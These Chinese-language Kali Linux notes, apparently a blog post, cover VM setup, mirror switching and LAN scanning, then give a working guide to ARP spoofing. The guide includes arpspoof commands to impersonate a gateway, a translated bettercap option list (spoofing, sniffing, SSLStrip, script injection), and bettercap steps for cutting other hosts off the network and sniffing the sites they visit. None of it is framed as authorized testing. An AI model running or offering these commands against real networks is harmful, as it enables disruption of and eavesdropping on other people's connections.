kali学习笔记
1、vm虚拟机安装vm-tool
更细系统源
sudo apt update
sudo apt upgrade
安装vm-tool,fuse是用户空间文件系统,实现虚拟机和kali之间的文件拖拽和内容复制
apt install open-vm-tools-desktop fuse
切换阿里源
终端输入 vi /etc/apt/sources.list
#阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
解决换阿里源签名错误
解决方法:
1.下载签名
wget archive.kali.org/archive-key.asc
2.添加下载好的签名
apt-key add archive-key.asc
扫描局域网内ip
nmap 是最受欢迎的网络扫描工具之一。使用 -sn 选项进行ping扫描,列出所有响应的主机:
nmap -sn 192.168.1.0/24
arp-scan 是一个用于扫描ARP缓存的命令行工具,它可以帮助你找出局域网中的活动主机:
arp-scan --interface=eth0 --localnet
fping 是一个类似于ping的网络扫描工具,它可以同时向多个主机发送网络请求:
fping -g 192.168.1.0/24
一行命令断开局域网主机网络
如果你的Kali Linux系统使用的是无线网卡,并且你的本机IP地址是192.168.0.16,而你想要伪装成局域网内的网关,你需要知道局域网内网关的确切IP地址。通常,局域网的默认网关地址会是类似于192.168.0.1或者其他位于同一子网内的IP地址。以下是伪装成网关的步骤:
- 确定无线网卡的接口名称:首先,你需要确定你的无线网卡接口的名称。在Kali Linux中,你可以使用以下命令来查找无线网卡的接口名称:
iwconfig
或者
ip link
通常无线网卡的名称会是
wlan0
、wlp3s0
等。 - 开启IP转发:为了使流量能够通过你的Kali Linux系统,你需要启用IP转发。在终端中输入以下命令:
echo 1 > /proc/sys/net/ipv4/ip_forward
- 使用arpspoof进行ARP欺骗:
arpspoof
工具可以帮助你发送伪造的ARP应答,将你的MAC地址与网关的IP地址关联起来,从而截获流量。假设你的无线网卡接口名称是wlan0
,局域网网关的IP地址是192.168.0.1
,你可以使用以下命令:arpspoof -i wlan0 -t 192.168.0.16 192.168.0.1
这里,
-t
参数后面紧跟着的是目标IP地址和网关的IP地址。 - 监控流量:在成功执行ARP欺骗后,你可以使用如
driftnet
或ettercap
等工具来监控或截取经过你的机器的网络流量。
bettercap用法:
1、调用网卡接口:bettercap -I wlan0
以下是 `bettercap` 命令行工具的参数及其中文翻译:
**主要参数**:
- `-I, --interface IFACE`:网络接口名称,默认为 `wlan0`。
- `--use-mac ADDRESS`:在执行攻击前,将接口的MAC地址更改为此值。
- `--random-mac`:在执行攻击前,将接口的MAC地址更改为一个随机值。
- `-G, --gateway ADDRESS`:手动指定网关地址,如果没有指定,将检索并使用当前网关。
- `-T, --target ADDRESS1,ADDRESS2`:目标IP地址,如果没有指定,将针对整个子网。
- `--ignore ADDRESS1,ADDRESS2`:在搜索目标时,如果发现这些地址则忽略它们。
- `--no-discovery`:不主动搜索主机,只使用当前的ARP缓存,默认为否。
- `--no-target-nbns`:禁用目标NBNS主机名解析。
- `--packet-throttle NUMBER`:指定在发送每个数据包之间等待的秒数(可以是小数)。
- `--check-updates`:检查是否有可用的更新,然后退出。
- `-R, --rainbows`:彩虹输出,因为这是一个非常有用的东西(需要安装 "lolize" gem)。
- `-h, --help`:显示可用选项。
**日志记录**:
- `-O, --log LOG_FILE`:将所有消息记录到文件中,如果没有指定,日志消息将只打印到shell。
- `--log-timestamp`:启用带有时间戳的日志记录,默认为否。
- `-D, --debug`:启用调试日志。
- `--silent`:不显示非错误或非警告的消息,默认为否。
**欺骗**:
- `-S, --spoofer NAME`:要使用的欺骗模块,可用的有:ARP, HSRP, ICMP, MAC, NDP, NONE,默认为IPv4用ARP,IPv6用NDP。
- `--no-spoofing`:禁用欺骗,是 `--spoofer NONE` 的别名。
- `--full-duplex`:启用全双工MITM,这将使 bettercap 攻击目标和路由器。
- `--kill`:不转发数据包,而是使目标连接被杀死。
**嗅探**:
- `-X, --sniffer`:启用嗅探器。
- `-L, --local`:解析来自/到此计算机地址的数据包(注意:将设置 -X 为 true),默认为否。
- `--sniffer-source FILE`:从指定的 PCAP 文件加载数据包,而不是接口(将启用嗅探器)。
- `--sniffer-output FILE`:将所有数据包保存到指定的 PCAP 文件(将启用嗅探器)。
- `--sniffer-filter EXPRESSION`:配置嗅探器使用此 BPF 过滤器(将启用嗅探器)。
- `-P, --parsers PARSERS`:要启用的数据包解析器的逗号分隔列表,'*' 代表全部(注意:将设置 -X 为 true),可用的有:ASTERISK, BFD, COOKIE, DHCP, DICT, FTP, HSRP, HTTPAUTH, HTTPS, IRC, MAIL, MPD, MYSQL, NNTP, NTLMSS, PGSQL, POST, RADIUS, REDIS, RLOGIN, SNMP, SNPP, TEAMTALK, TEAMVIEWER, URL, WHATSAPP, WOL,默认为 '*'。
- `--disable-parsers PARSERS`:要禁用的数据包解析器的逗号分隔列表(注意:将设置 -X 为 true)。
- `--custom-parser EXPRESSION`:使用自定义正则表达式来捕获和显示嗅探的数据(注意:将设置 -X 为 true)。
**代理**:
- **TCP**:
- `--tcp-proxy`:启用TCP代理(需要指定其他 --tcp-proxy-* 选项)。
- `--tcp-proxy-module MODULE`:要加载的Ruby TCP代理模块。
- `--tcp-proxy-port PORT`:设置本地TCP代理端口,默认为 2222。
- `--tcp-proxy-upstream ADDRESS:PORT`:设置TCP代理上游服务器地址和端口。
- `--tcp-proxy-upstream-address ADDRESS`:设置TCP代理上游服务器地址。
- `--tcp-proxy-upstream-port PORT`:设置TCP代理上游服务器端口。
- **UDP**:
- `--udp-proxy`:启用UDP代理(需要指定其他 --udp-proxy-* 选项)。
- `--udp-proxy-module MODULE`:要加载的Ruby UDP代理模块。
- `--udp-proxy-port PORT`:设置本地UDP代理端口,默认为 3333。
- `--udp-proxy-upstream ADDRESS:PORT`:设置UDP代理上游服务器地址和端口。
- `--udp-proxy-upstream-address ADDRESS`:设置UDP代理上游服务器地址。
- `--udp-proxy-upstream-port PORT`:设置UDP代理上游服务器端口。
- **HTTP**:
- `--proxy`:启用HTTP代理,并将所有HTTP请求重定向到该代理,默认为否。
- `--proxy-port PORT`:设置HTTP代理端口,默认为 8080。
- `--allow-local-connections`:允许直接连接到代理实例,默认为否。
- `--no-sslstrip`:禁用SSLStrip。
- `--log-http-response`:记录HTTP响应。
- `--no-http-logs`:禁止记录HTTP请求和响应日志。
- `--proxy-module MODULE`:要加载的Ruby代理模块,可以是自定义文件或以下之一:injectjs, injecthtml, injectcss, redirect。
- `--http-ports PORT1,PORT2`:要重定向到代理的HTTP端口的逗号分隔列表,默认为 80。
- `--proxy-upstream-address ADDRESS`:如果设置,只有来自此服务器地址的请求将被重定向到HTTP/HTTPS代理。
- **HTTPS**:
- `--proxy-https`:启用HTTPS代理,并将所有HTTPS请求重定向到该代理,默认为否。
- `--proxy-https-port PORT`:设置HTTPS代理端口,默认为 8083。
- `--proxy-pem FILE`:为HTTPS代理使用自定义的PEM CA证书文件,默认为 /root/.bettercap/bettercap-ca.pem 。
- `--https-ports PORT1,PORT2`:要重定向到代理的HTTPS端口的逗号分隔列表,默认为 443。
- **自定义**:
- `--custom-proxy ADDRESS`:使用自定义HTTP上游代理而不是内置的。
- `--custom-proxy-port PORT`:为自定义HTTP上游代理指定端口,默认为 8080。
- `--custom-https-proxy ADDRESS`:使用自定义HTTPS上游代理而不是内置的。
- `--custom-https-proxy-port PORT`:为自定义HTTPS上游代理指定端口,默认为 8083。
- `--custom-redirection RULE`:应用自定义端口重定向,规则格式为 PROTOCOL ORIGINAL_PORT NEW_PORT。例如,TCP 21 2100 将重定向所有前往端口21的TCP流量至端口2100。
**服务器**:
- `--httpd`:启用HTTP服务器,默认为否。
- `--httpd-port PORT`:设置HTTP服务器端口,默认为 8081。
- `--httpd-path PATH`:设置HTTP服务器路径,默认为 ./。
- `--dns FILE`:启用DNS服务器,并使用此文件作为主机解析表。
- `--dns-port PORT`:设置DNS服务器端口,默认为 5300。
有关示例和文档,请访问 https://bettercap.org/。
arpspoof是arp欺骗,我推荐大家用kali的bettercap(一款简单,易懂,高效的局域网渗透监听工具)
在bettercap内用:
1.net.probe(局域网分析)
2.net.show(局域网存活机展示)
3.set arp.spoof.targets 【目标ip】, 【网关ip】(设置arp欺骗对象)
4.arp.ban on(开始断网)
arp.ban off(停止断网)
同时在3步后可以用:
4.arp.spoof on(开始欺骗)
5.net.sniff on(开始嗅探,可以用此捕获对方浏览的网址)
教各位咋下
1.sudo apt update(打开终端并更新包列表)
2.sudo apt install build-essential ruby-dev libpcap-dev(安装Bettercap依赖项)
3.sudo gem install bettercap(安装Bettercap)
4.sudo bettercap -eval "caplets.update; sslstrip.status"(安装SSL证书)
更多的怎么使用去查教程,这会比kali自带的arpspoof好用很多,同时兼具dns重定向等局域网渗透功能!